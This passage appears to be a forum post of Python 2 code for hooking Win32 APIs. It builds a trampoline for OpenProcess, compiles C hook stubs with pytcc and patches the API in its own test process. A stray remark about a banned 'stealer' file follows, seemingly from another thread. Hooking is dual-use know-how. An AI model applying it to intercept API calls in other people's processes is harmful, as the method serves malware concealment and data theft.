    hprocess = OpenProcess ()
    original_bytes = PyGetString (apiaddress, 300)
    tramp_memory = allocate (len (original_bytes) + 50, hprocess)
    print "Tramp memory: %s %s." % (tramp_memory, hex (tramp_memory))
    instructions = Decode (apiaddress, original_bytes)
    sizes = iter ([X[1] for X in instructions])
    # advance whole instructions until the hook's bytes are covered
    while landing_offset < hook_size:
        landing_offset += sizes.next ()
    landing_address = apiaddress + landing_offset
    DB ("Landing offset : %s %s" % (landing_offset, hex (landing_offset)))
    DB ("Landing address: %s %s" % (landing_address, hex (landing_address)))
    distance = landing_address - (tramp_memory +landing_offset)
    DB ("Distance: %s %s." % (distance, hex (distance)))
    tramp_code = original_bytes [:landing_offset] # api start - past hook - to start of instruction
    instructions = Decode (apiaddress, tramp_code)
    boffset = 0
    for offset, size, instruction, hexstr in instructions:
        if filter (lambda x:x.lower() in instruction.lower(), ["call", "jmp"]):
            raise RuntimeError ("[not supported yet] Cannot relocate CALL/JMP Instructions. Address: %s"% (apiaddress + boffset))
        boffset += size
    #
    # TODO !Recalculate Relocated Relative jmp and call addresses.
    #
    jump_code = '\xe9' + pack ("i", distance - 5) # bytes = jmp (distance - size of jump)
    tramp_code += jump_code
    # DEBUG
    DB ("Tramp [size]: %s [bytes]; %s" % (len(tramp_code), (repr(tramp_code))))
    DB ("Tramper api decode.")
    if DEBUG:
        dprint (apiaddress, tramp_code)
    # # # #
    writeMemory (hprocess, tramp_memory, tramp_code)
    CloseHandle (hprocess)
    return tramp_memory

def dprint (a, c):
    """ pretty print disassembled bytes. dprint (offset, bytes)."""
    x = Decode (a, c)
    print "[deci addr : hexi addr] [size] instruction\n"
    for offset, size, instruction, hexstr in x:
        print "[%s : %s] [%s] %s" % (a,hex (a), size, instruction)
        a += size

if __name__ == "__main__":
    # Test.
    lib = LoadLibrary ("kernel32")
    OpenProcessAddr = GetProcAddress (lib, "OpenProcess")
    FreeLibrary (lib)
    trampAddr = tramper (\
        apiaddress=OpenProcessAddr, # (optional if apiname is defined) API address to duplicate.
        hook_size=10,               # size of our API jmp code. (minimum size of relocated API bytes)
        apiname=None,               # (optional)
        dllname="kernel32")         # (optional / defaults to kernel32)
    # Prototype the OpenProcess trampoline.
    duplicate_OpenProcess = WINFUNCTYPE (c_int, c_int, c_int, c_int) (trampAddr)
    pid = GetCurrentProcessId ()
    print "Calling duplicate OpenProcess with pid: %s" % pid
    phandle = duplicate_OpenProcess (0x1f0fff, 0, pid)
    print "Return value: %s." %phandle
    if phandle:
        CloseHandle (phandle)
#cad
```

```python
# hooker.py
# deals with hooking of win32 APIs.
# public domain code.

from patcher import *
from tramper import tramper
from win32api import *
from pytcc import pytcc

def create_hook (duplicate_api, cparam_types='', prelogic="", postlogic="", restype="int"):
    """ create_hook (duplicate_api, cparam_types='', prelogic="", postlogic="", restype="int"): """
    # C template: the patch stub CALLs this function, so the first stack slot
    # is the return address into the patched API (named "caller" here).
    c_code =\
    """
%s function (int caller, %s) {
    %s
    %s RET = DUPE ( %s );
    %s
    return RET;
}"""
    cargs = ''
    symbols = ''
    for arg, char in zip (cparam_types, "ABCDEFGHIJKLMNOPQRSTUVWXYZ"):
        symbols += "%s, " % char
        cargs += "%s %s, " % (arg, char)
    symbols = symbols [:-2]
    cargs = cargs [:-2]
    c_code = c_code % (restype, cargs, prelogic, restype, symbols, postlogic)
    ccompiler = pytcc ()
    ccompiler.add_lib_proc ("msvcrt.dll", "memset")
    ccompiler.add_symbol ("DUPE", duplicate_api)
    ccompiler.compile (c_code)
    ccompiler.relocate ()
    hook = ccompiler.get_symbol ("function")
    return (c_code, hook)

def hooker (apiname, cparam_types=list(), restype="int", prelogic='', postlogic='', pid=GetCurrentProcessId(), dllname="kernel32"):
    """hooker (apiname, cparam_types=list(), restype="int", prelogic='', postlogic='', pid=GetCurrentProcessId(), dllname="kernel32"): """
    pat = patcher ()
    params_size = get_cparams_size (cparam_types)
    pat.set_params_size (params_size)
    pat.set_source_as_api (apiname, dllname)
    hook_size = len (get_patch (pat.destination, pat.params_size))
    tramp = tramper (pat.source, hook_size)
    pat.duplicate_api = tramp
    hook_ccode, hooks = create_hook (tramp, cparam_types, prelogic, postlogic, restype)
    pat.c_code = hook_ccode
    pat.set_destination (hooks)
    return pat

if __name__ == '__main__':
    # Test.
    hook = hooker (
        # API to hook
        apiname="OpenProcess",
        # the DLL the API is in. (defaults to kernel32)
        dllname="kernel32",
        # (required) API parameter types. In our hook these get translated to the names A,B,C...respectively.
        cparam_types=["int", "int", "int"],
        # (required) the API return type.
        restype="int",
        # (optional) this is the code in our hook which is executed Before the real API.
        prelogic="if (C==1) {return 1111;}",
        # (optional) this is the code in our hook which is executed After the real API. The real API's return value is named RET.
        postlogic="if (RET) {return 0;}"
        )
    # hook API.
    # hook automatically unhooks itself and cleans up when it isnt refered to anymore.
    hook.patch ()
    print "Calling hooked OpenProcess api with process id as 1."
    ret = windll.kernel32.OpenProcess (0x1f0fff, 0, 1)
    print "Return value: %s" % ret
    if ret == 1111:
        print "This test was sucesful."
    else:
        print "Return value is unexpected."
    # unhook API.
    # hook.unpatch ()
#cad
```

Download: http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3110

Source: API Hooking in Python - rohitab.com - Forums
-
No, it contained SQLite, so it was 99% a Stealer, which among other things was also for Firefox. I didn't bother to analyze the file, I saw that and banned.